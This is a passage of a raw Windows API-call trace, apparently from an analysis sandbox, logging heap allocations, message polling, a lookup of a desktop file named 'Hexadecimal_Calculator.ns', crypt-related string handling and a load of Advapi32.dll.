(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0157.778] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0157.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0157.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0157.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0157.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0157.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0157.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0157.780] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0157.780] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0157.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.781] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.781] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.781] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0157.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0157.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0157.782] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0157.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0157.782] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Hexadecimal_Calculator.ns", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd48798c8, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd48798c8, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd48798c8, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x33fc, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Hexadecimal_Calculator.ns", cAlternateFileName="HEXADE~1.NS")) returned 0xa872d0 [0157.783] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0157.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.783] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.784] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0157.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.784] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0157.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0157.785] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.785] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0157.785] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0157.785] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0157.785] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0157.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0157.786] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0157.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0157.786] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0157.786] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0157.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0157.787] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0157.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.787] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.787] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0157.788] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0157.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0157.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0157.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0157.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0157.788] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0157.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0157.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0157.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0157.789] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0157.789] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0157.789] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0157.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0157.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0157.790] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0157.790] RtlAllocateHeap (HeapHandle=0x970000, 